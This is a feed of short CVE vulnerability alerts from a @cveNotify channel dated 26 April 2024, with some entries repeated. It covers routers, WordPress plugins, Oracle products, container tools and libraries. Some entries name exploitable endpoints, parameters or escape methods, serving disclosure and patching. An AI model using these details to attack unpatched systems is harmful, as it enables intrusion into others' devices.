🚨 CVE-2024-31601An issue in Beijing Panabit Network Software Co., Ltd Panalog big data analysis platform v. 20240323 and before allows attackers to execute arbitrary code via the exportpdf.php component.🎖@cveNotify |
|
| 2024-04-26 21:37:24 |
🚨 CVE-2024-31502An issue in Insurance Management System v.1.0.0 and before allows a remote attacker to escalate privileges via a crafted POST request to /admin/core/new_staff.🎖@cveNotify |
|
| 2024-04-26 20:37:33 |
🚨 CVE-2024-4238A vulnerability has been found in Tenda AX1806 1.0.0.1 and classified as critical. Affected by this vulnerability is the function formSetDeviceName of the file /goform/SetOnlineDevName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-262129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-26 20:37:29 |
🚨 CVE-2024-28326Incorrect Access Control in Asus RT-N12+ B1 routers allows local attackers to obtain root terminal access via the the UART interface.🎖@cveNotify |
|
| 2024-04-26 20:37:28 |
🚨 CVE-2022-48611A logic issue was addressed with improved checks. This issue is fixed in iTunes 12.12.4 for Windows. A local attacker may be able to elevate their privileges.🎖@cveNotify |
|
| 2024-04-26 20:37:27 |
🚨 CVE-2024-1725A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.🎖@cveNotify |
|
| 2024-04-26 20:07:31 |
🚨 CVE-2024-28325Asus RT-N12+ B1 router stores credentials in cleartext, which could allow local attackers to obtain unauthorized access and modify router settings.🎖@cveNotify |
|
| 2024-04-26 20:07:30 |
🚨 CVE-2024-4235A vulnerability classified as problematic was found in Netgear DG834Gv5 1.6.01.34. This vulnerability affects unknown code of the component Web Management Interface. The manipulation leads to cleartext storage of sensitive information. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-262126 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-26 20:07:26 |
🚨 CVE-2024-33343D-Link DIR-822+ V1.0.5 was found to contain a command injection in ChgSambaUserSettings function of prog.cgi, which allows remote attackers to execute arbitrary commands via shell.🎖@cveNotify |
|
| 2024-04-26 20:07:25 |
🚨 CVE-2024-32884gitoxide is a pure Rust implementation of Git. `gix-transport` does not check the username part of a URL for text that the external `ssh` program would interpret as an option. A specially crafted clone URL can smuggle options to SSH. The possibilities are syntactically limited, but if a malicious clone URL is used by an application whose current working directory contains a malicious file, arbitrary code execution occurs. This is related to the patched vulnerability GHSA-rrjw-j4m2-mf34, but appears less severe due to a greater attack complexity. This issue has been patched in versions 0.35.0, 0.42.0 and 0.62.0.🎖@cveNotify |
|
| 2024-04-26 20:07:24 |
🚨 CVE-2024-32880pyload is an open-source Download Manager written in pure Python. An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution. There is no fix available at the time of publication.🎖@cveNotify |
|
| 2024-04-26 19:37:25 |
🚨 CVE-2024-28327Asus RT-N12+ B1 router stores user passwords in plaintext, which could allow local attackers to obtain unauthorized access and modify router settings.🎖@cveNotify |
|
| 2024-04-26 19:37:24 |
🚨 CVE-2024-28325Asus RT-N12+ B1 router stores credentials in cleartext, which could allow local attackers to obtain unauthorized access and modify router settings.🎖@cveNotify |
|
| 2024-04-26 18:37:33 |
🚨 CVE-2024-4236A vulnerability, which was classified as critical, has been found in Tenda AX1803 1.0.0.1. This issue affects the function formSetSysToolDDNS of the file /goform/SetDDNSCfg. The manipulation of the argument serverName/ddnsUser/ddnsPwd/ddnsDomain leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-262127. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-26 18:37:32 |
🚨 CVE-2024-4235A vulnerability classified as problematic was found in Netgear DG834Gv5 1.6.01.34. This vulnerability affects unknown code of the component Web Management Interface. The manipulation leads to cleartext storage of sensitive information. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-262126 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-26 18:37:27 |
🚨 CVE-2024-33344D-Link DIR-822+ V1.0.5 was found to contain a command injection in ftext function of upload_firmware.cgi, which allows remote attackers to execute arbitrary commands via shell.🎖@cveNotify |
|
| 2024-04-26 18:37:26 |
🚨 CVE-2024-33343D-Link DIR-822+ V1.0.5 was found to contain a command injection in ChgSambaUserSettings function of prog.cgi, which allows remote attackers to execute arbitrary commands via shell.🎖@cveNotify |
|
| 2024-04-26 18:37:25 |
🚨 CVE-2024-32884gitoxide is a pure Rust implementation of Git. `gix-transport` does not check the username part of a URL for text that the external `ssh` program would interpret as an option. A specially crafted clone URL can smuggle options to SSH. The possibilities are syntactically limited, but if a malicious clone URL is used by an application whose current working directory contains a malicious file, arbitrary code execution occurs. This is related to the patched vulnerability GHSA-rrjw-j4m2-mf34, but appears less severe due to a greater attack complexity. This issue has been patched in versions 0.35.0, 0.42.0 and 0.62.0.🎖@cveNotify |
|
| 2024-04-26 18:37:24 |
🚨 CVE-2024-32880pyload is an open-source Download Manager written in pure Python. An authenticated user can change the download folder and upload a crafted template to the specified folder lead to remote code execution. There is no fix available at the time of publication.🎖@cveNotify |
|
| 2024-04-26 15:37:48 |
🚨 CVE-2023-41290A path traversal vulnerability has been reported to affect QuFirewall. If exploited, the vulnerability could allow authenticated administrators to read the contents of unexpected files and expose sensitive data via a network.We have already fixed the vulnerability in the following version:QuFirewall 2.4.1 ( 2024/02/01 ) and later🎖@cveNotify |
|
| 2024-04-26 15:37:47 |
🚨 CVE-2022-40975Missing Authorization vulnerability in Aazztech Post Slider.This issue affects Post Slider: from n/a through 1.6.7.🎖@cveNotify |
|
| 2024-04-26 15:37:46 |
🚨 CVE-2024-4234Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sayful Islam Filterable Portfolio allows Stored XSS.This issue affects Filterable Portfolio: from n/a through 1.6.4.🎖@cveNotify |
|
| 2024-04-26 15:37:42 |
🚨 CVE-2024-33696Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Broadstreet XPRESS WordPress Ad Widget allows Stored XSS.This issue affects WordPress Ad Widget: from n/a through 2.20.0.🎖@cveNotify |
|
| 2024-04-26 15:37:41 |
🚨 CVE-2024-33694Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meks Meks ThemeForest Smart Widget allows Stored XSS.This issue affects Meks ThemeForest Smart Widget: from n/a through 1.5.🎖@cveNotify |
|
| 2024-04-26 15:37:40 |
🚨 CVE-2024-33693Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meks Meks Smart Social Widget allows Stored XSS.This issue affects Meks Smart Social Widget: from n/a through 1.6.4.🎖@cveNotify |
|
| 2024-04-26 15:37:36 |
🚨 CVE-2024-33691Cross-Site Request Forgery (CSRF) vulnerability in OptinMonster Popup Builder Team OptinMonster.This issue affects OptinMonster: from n/a through 2.15.3.🎖@cveNotify |
|
| 2024-04-26 15:37:35 |
🚨 CVE-2024-33689Cross-Site Request Forgery (CSRF) vulnerability in Tony Zeoli, Tony Hayes Radio Station.This issue affects Radio Station: from n/a through 2.5.7.🎖@cveNotify |
|
| 2024-04-26 15:37:34 |
🚨 CVE-2024-33688Cross-Site Request Forgery (CSRF) vulnerability in Extend Themes Teluro.This issue affects Teluro: from n/a through 1.0.31.🎖@cveNotify |
|
| 2024-04-26 15:37:30 |
🚨 CVE-2024-20359A vulnerability in a legacy capability that allowed for the preloading of VPN clients and plug-ins and that has been available in Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an authenticated, local attacker to execute arbitrary code with root-level privileges. Administrator-level privileges are required to exploit this vulnerability. This vulnerability is due to improper validation of a file when it is read from system flash memory. An attacker could exploit this vulnerability by copying a crafted file to the disk0: file system of an affected device. A successful exploit could allow the attacker to execute arbitrary code on the affected device after the next reload of the device, which could alter system behavior. Because the injected code could persist across device reboots, Cisco has raised the Security Impact Rating (SIR) of this advisory from Medium to High.🎖@cveNotify |
|
| 2024-04-26 15:37:29 |
🚨 CVE-2024-3371MongoDB Compass may accept and use insufficiently validated input from an untrusted external source. This may cause unintended application behavior, including data disclosure and enabling attackers to impersonate users. This issue affects MongoDB Compass versions 1.35.0 to 1.42.0.🎖@cveNotify |
|
| 2024-04-26 15:37:28 |
🚨 CVE-2024-4040A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.🎖@cveNotify |
|
| 2024-04-26 14:37:25 |
🚨 CVE-2024-3076The MM-email2image WordPress plugin through 0.2.5 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack🎖@cveNotify |
|
| 2024-04-26 14:37:24 |
🚨 CVE-2022-40975Missing Authorization vulnerability in Aazztech Post Slider.This issue affects Post Slider: from n/a through 1.6.7.🎖@cveNotify |
|
| 2024-04-26 13:37:38 |
🚨 CVE-2024-4234Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sayful Islam Filterable Portfolio allows Stored XSS.This issue affects Filterable Portfolio: from n/a through 1.6.4.🎖@cveNotify |
|
| 2024-04-26 13:37:37 |
🚨 CVE-2024-33697Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rimes Gold CF7 File Download – File Download for CF7 allows Stored XSS.This issue affects CF7 File Download – File Download for CF7: from n/a through 2.0.🎖@cveNotify |
|
| 2024-04-26 13:37:33 |
🚨 CVE-2024-33695Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeNcode Fan Page Widget by ThemeNcode allows Stored XSS.This issue affects Fan Page Widget by ThemeNcode: from n/a through 2.0.🎖@cveNotify |
|
| 2024-04-26 13:37:32 |
🚨 CVE-2024-33694Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meks Meks ThemeForest Smart Widget allows Stored XSS.This issue affects Meks ThemeForest Smart Widget: from n/a through 1.5.🎖@cveNotify |
|
| 2024-04-26 13:37:31 |
🚨 CVE-2024-33693Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Meks Meks Smart Social Widget allows Stored XSS.This issue affects Meks Smart Social Widget: from n/a through 1.6.4.🎖@cveNotify |
|
| 2024-04-26 13:37:30 |
🚨 CVE-2024-33692Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Satrya Smart Recent Posts Widget allows Stored XSS.This issue affects Smart Recent Posts Widget: from n/a through 1.0.3.🎖@cveNotify |
|
| 2024-04-26 13:37:26 |
🚨 CVE-2024-33690Cross-Site Request Forgery (CSRF) vulnerability in Jegstudio Financio.This issue affects Financio: from n/a through 1.1.3.🎖@cveNotify |
|
| 2024-04-26 13:37:25 |
🚨 CVE-2024-33688Cross-Site Request Forgery (CSRF) vulnerability in Extend Themes Teluro.This issue affects Teluro: from n/a through 1.0.31.🎖@cveNotify |
|
| 2024-04-26 13:37:24 |
🚨 CVE-2023-52646In the Linux kernel, the following vulnerability has been resolved:aio: fix mremap after fork null-derefCommit e4a0d3e720e7 ("aio: Make it possible to remap aio ring") introduceda null-deref if mremap is called on an old aio mapping after fork asmm->ioctx_table will be set to NULL.[jmoyer@redhat.com: fix 80 column issue]🎖@cveNotify |
|
| 2024-04-26 13:07:25 |
🚨 CVE-2024-32645Vyper is a pythonic Smart Contract Language for the Ethereum virtual machine. In versions 0.3.10 and prior, incorrect values can be logged when `raw_log` builtin is called with memory or storage arguments to be used as topics. A contract search was performed and no vulnerable contracts were found in production. The `build_IR` function of the `RawLog` class fails to properly unwrap the variables provided as topics. Consequently, incorrect values are logged as topics. As of time of publication, no fixed version is available.🎖@cveNotify |
|
| 2024-04-26 13:07:24 |
🚨 CVE-2024-2905A security vulnerability has been discovered within rpm-ostree, pertaining to the /etc/shadow file in default builds having the world-readable bit enabled. This issue arises from the default permissions being set at a higher level than recommended, potentially exposing sensitive authentication data to unauthorized access.🎖@cveNotify |
|
| 2024-04-26 12:37:24 |
🚨 CVE-2024-32822Missing Authorization vulnerability in impleCode Reviews Plus.This issue affects Reviews Plus: from n/a through 1.3.4.🎖@cveNotify |
|
| 2024-04-26 11:37:33 |
🚨 CVE-2024-33683Cross-Site Request Forgery (CSRF) vulnerability in WP Republic Hide Dashboard Notifications.This issue affects Hide Dashboard Notifications: from n/a through 1.2.3.🎖@cveNotify |
|
| 2024-04-26 11:37:32 |
🚨 CVE-2024-33680Cross-Site Request Forgery (CSRF) vulnerability in MainWP MainWP Child Reports.This issue affects MainWP Child Reports: from n/a through 2.1.1.🎖@cveNotify |
|
| 2024-04-26 11:37:31 |
🚨 CVE-2024-33679Cross-Site Request Forgery (CSRF) vulnerability in FameThemes FameTheme Demo Importer.This issue affects FameTheme Demo Importer: from n/a through 1.1.5.🎖@cveNotify |
|
| 2024-04-26 11:37:30 |
🚨 CVE-2024-33678Cross-Site Request Forgery (CSRF) vulnerability in ClickCease ClickCease Click Fraud Protection.This issue affects ClickCease Click Fraud Protection: from n/a through 3.2.4.🎖@cveNotify |
|
| 2024-04-26 11:37:27 |
🚨 CVE-2024-33677Cross-Site Request Forgery (CSRF) vulnerability in Renzo Johnson Contact Form 7 Extension For Mailchimp.This issue affects Contact Form 7 Extension For Mailchimp: from n/a through 0.5.70.🎖@cveNotify |
|
| 2024-04-26 11:37:26 |
🚨 CVE-2024-32957Missing Authorization vulnerability in Live Composer Team Page Builder: Live Composer.This issue affects Page Builder: Live Composer: from n/a through 1.5.38.🎖@cveNotify |
|
| 2024-04-26 11:37:25 |
🚨 CVE-2024-32828Missing Authorization vulnerability in Octolize Flexible Shipping.This issue affects Flexible Shipping: from n/a through 4.24.15.🎖@cveNotify |
|
| 2024-04-26 11:37:24 |
🚨 CVE-2024-32826Missing Authorization vulnerability in Vektor,Inc. VK Block Patterns.This issue affects VK Block Patterns: from n/a through 1.31.0.🎖@cveNotify |
|
| 2024-04-26 09:37:45 |
🚨 CVE-2024-21011Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Oracle Java SE: 8u401, 8u401-perf, 11.0.22, 17.0.10, 21.0.2, 22; Oracle GraalVM for JDK: 17.0.10, 21.0.2, 22; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability can be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. This vulnerability also applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-04-26 09:37:44 |
🚨 CVE-2024-21008Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-04-26 09:37:43 |
🚨 CVE-2024-21005Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u401; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-04-26 09:37:42 |
🚨 CVE-2024-21004Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u401; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle Java SE, Oracle GraalVM Enterprise Edition executes to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 2.5 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-04-26 09:37:39 |
🚨 CVE-2024-21003Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u401; Oracle GraalVM Enterprise Edition: 20.3.13 and 21.3.9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N).🎖@cveNotify |
|
| 2024-04-26 09:37:38 |
🚨 CVE-2024-21000Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 3.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N).🎖@cveNotify |
|
| 2024-04-26 09:37:37 |
🚨 CVE-2024-20994Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Information Schema). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-04-26 09:37:33 |
🚨 CVE-2024-20993Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.35 and prior and 8.2.0 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-04-26 09:37:32 |
🚨 CVE-2023-5679A bad interaction between DNS64 and serve-stale may cause `named` to crash with an assertion failure during recursive resolution, when both of these features are enabled.This issue affects BIND 9 versions 9.16.12 through 9.16.45, 9.18.0 through 9.18.21, 9.19.0 through 9.19.19, 9.16.12-S1 through 9.16.45-S1, and 9.18.11-S1 through 9.18.21-S1.🎖@cveNotify |
|
| 2024-04-26 09:37:31 |
🚨 CVE-2024-0853curl inadvertently kept the SSL session ID for connections in its cache even when the verify status (*OCSP stapling*) test failed. A subsequent transfer tothe same hostname could then succeed if the session ID cache was still fresh, which then skipped the verify status check.🎖@cveNotify |
|
| 2024-04-26 09:37:27 |
🚨 CVE-2023-6129Issue summary: The POLY1305 MAC (message authentication code) implementationcontains a bug that might corrupt the internal state of applications runningon PowerPC CPU based platforms if the CPU provides vector instructions.Impact summary: If an attacker can influence whether the POLY1305 MACalgorithm is used, the application state might be corrupted with variousapplication dependent consequences.The POLY1305 MAC (message authentication code) implementation in OpenSSL forPowerPC CPUs restores the contents of vector registers in a different orderthan they are saved. Thus the contents of some of these vector registersare corrupted when returning to the caller. The vulnerable code is used onlyon newer PowerPC processors supporting the PowerISA 2.07 instructions.The consequences of this kind of internal application state corruption canbe various - from no consequences, if the calling application does notdepend on the contents of non-volatile XMM registers at all, to the worstconsequences, where the attacker could get complete control of the applicationprocess. However unless the compiler uses the vector registers for storingpointers, the most likely consequence, if any, would be an incorrect resultof some application dependent calculations or a crash leading to a denial ofservice.The POLY1305 MAC algorithm is most frequently used as part of theCHACHA20-POLY1305 AEAD (authenticated encryption with associated data)algorithm. The most common usage of this AEAD cipher is with TLS protocolversions 1.2 and 1.3. If this cipher is enabled on the server a maliciousclient can influence whether this AEAD cipher is used. This implies thatTLS server applications using OpenSSL can be potentially impacted. Howeverwe are currently not aware of any concrete application that would be affectedby this issue therefore we consider this a Low severity security issue.🎖@cveNotify |
|
| 2024-04-26 09:37:26 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2024-04-26 09:37:25 |
🚨 CVE-2023-32643A flaw was found in GLib. The GVariant deserialization code is vulnerable to a heap buffer overflow introduced by the fix for CVE-2023-32665. This bug does not affect any released version of GLib, but does affect GLib distributors who followed the guidance of GLib developers to backport the initial fix for CVE-2023-32665.🎖@cveNotify |
|
| 2024-04-26 08:37:37 |
🚨 CVE-2024-3678The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.4.2. This makes it possible for unauthenticated attackers to view limited information from password protected posts.🎖@cveNotify |
|
| 2024-04-26 08:37:36 |
🚨 CVE-2024-33651Cross-Site Request Forgery (CSRF) vulnerability in Matthew Fries MF Gig Calendar.This issue affects MF Gig Calendar : from n/a through 1.2.1.🎖@cveNotify |
|
| 2024-04-26 08:37:32 |
🚨 CVE-2024-33642Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in EkoJR Advanced Post List allows Stored XSS.This issue affects Advanced Post List: from n/a through 0.5.6.1.🎖@cveNotify |
|
| 2024-04-26 08:37:31 |
🚨 CVE-2024-33638Cross-Site Request Forgery (CSRF) vulnerability in Brijesh Kothari Smart Maintenance Mode.This issue affects Smart Maintenance Mode: from n/a through 1.4.4.🎖@cveNotify |
|
| 2024-04-26 08:37:30 |
🚨 CVE-2024-33598Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Twinpictures Annual Archive allows Stored XSS.This issue affects Annual Archive: from n/a through 1.6.0.🎖@cveNotify |
|
| 2024-04-26 08:37:26 |
🚨 CVE-2023-6116Team ENVY, a Security Research TEAM has found a flaw that allows for a remote code execution on the camera. An attacker could inject malicious into http request packets to execute arbitrary code. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds.🎖@cveNotify |
|
| 2024-04-26 08:37:25 |
🚨 CVE-2023-6095Vladimir Kononovich, a Security Researcher has found a flaw that allows for a remote code execution on the DVR. An attacker could inject malicious HTTP headers into request packets to execute arbitrary code. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds.🎖@cveNotify |
|
| 2024-04-26 08:37:24 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-04-26 07:37:26 |
🚨 CVE-2019-19331knot-resolver before version 4.3.0 is vulnerable to denial of service through high CPU utilization. DNS replies with very many resource records might be processed very inefficiently, in extreme cases taking even several CPU seconds for each such uncached message. For example, a few thousand A records can be squashed into one DNS message (limit is 64kB).🎖@cveNotify |
|
| 2024-04-26 07:37:25 |
🚨 CVE-2019-10190A vulnerability was discovered in DNS resolver component of knot resolver through version 3.2.0 before 4.1.0 which allows remote attackers to bypass DNSSEC validation for non-existence answer. NXDOMAIN answer would get passed through to the client even if its DNSSEC validation failed, instead of sending a SERVFAIL packet. Caching is not affected by this particular bug but see CVE-2019-10191.🎖@cveNotify |
|
| 2024-04-26 06:37:24 |
🚨 CVE-2024-4056Denial of service condition in M-Files Server in versions before 24.4.13592.4 and after 23.11 (excluding 24.2 LTS) allows unauthenticated user to consume computing resources.🎖@cveNotify |
|
| 2024-04-26 05:37:36 |
🚨 CVE-2024-3075The MM-email2image WordPress plugin through 0.2.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-04-26 05:37:35 |
🚨 CVE-2024-3059The ENL Newsletter WordPress plugin through 1.0.1 does not have CSRF checks in some places, which could allow attackers to make logged in admins delete arbitrary Campaigns via a CSRF attack🎖@cveNotify |
|
| 2024-04-26 05:37:31 |
🚨 CVE-2024-3048The Bannerlid WordPress plugin through 1.1.0 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators🎖@cveNotify |
|
| 2024-04-26 05:37:30 |
🚨 CVE-2024-2603The Salon booking system WordPress plugin through 9.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin (or editor depending on Salon booking system WordPress plugin through 9.6.5 configuration) to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-26 05:37:26 |
🚨 CVE-2024-2439The Salon booking system WordPress plugin through 9.6.5 does not sanitise and escape some of its settings, which could allow high privilege users such as Editor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-04-26 05:37:25 |
🚨 CVE-2024-2159The Social Sharing Plugin WordPress plugin before 3.3.61 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-04-26 05:37:24 |
🚨 CVE-2024-0905The Fancy Product Designer WordPress plugin before 6.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against unauthenticated and admin-level users🎖@cveNotify |
|
| 2024-04-26 04:37:29 |
🚨 CVE-2024-3154A flaw was found in cri-o, where an arbitrary systemd property can be injected via a Pod annotation. Any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.🎖@cveNotify |
|
| 2024-04-26 04:37:26 |
🚨 CVE-2024-32406Server-Side Template Injection (SSTI) vulnerability in inducer relate before v.2024.1 allows a remote attacker to execute arbitrary code via a crafted payload to the Batch-Issue Exam Tickets function.🎖@cveNotify |
|
| 2024-04-26 04:37:25 |
🚨 CVE-2024-22633Setor Informatica Sistema Inteligente para Laboratorios (S.I.L.) 388 was discovered to contain a remote code execution (RCE) vulnerability via the hprinter parameter. This vulnerability is triggered via a crafted POST request.🎖@cveNotify |
|
| 2024-04-26 04:37:24 |
🚨 CVE-2024-30564An issue inandrei-tatar nora-firebase-common between v.1.0.41 and v.1.12.2 allows a remote attacker to execute arbitrary code via a crafted script to the updateState parameter of the updateStateInternal method.🎖@cveNotify |
|
| 2024-04-26 03:37:25 |
🚨 CVE-2024-31755cJSON v1.7.17 was discovered to contain a segmentation violation, which can trigger through the second parameter of function cJSON_SetValuestring at cJSON.c.🎖@cveNotify |
|
| 2024-04-26 03:37:24 |
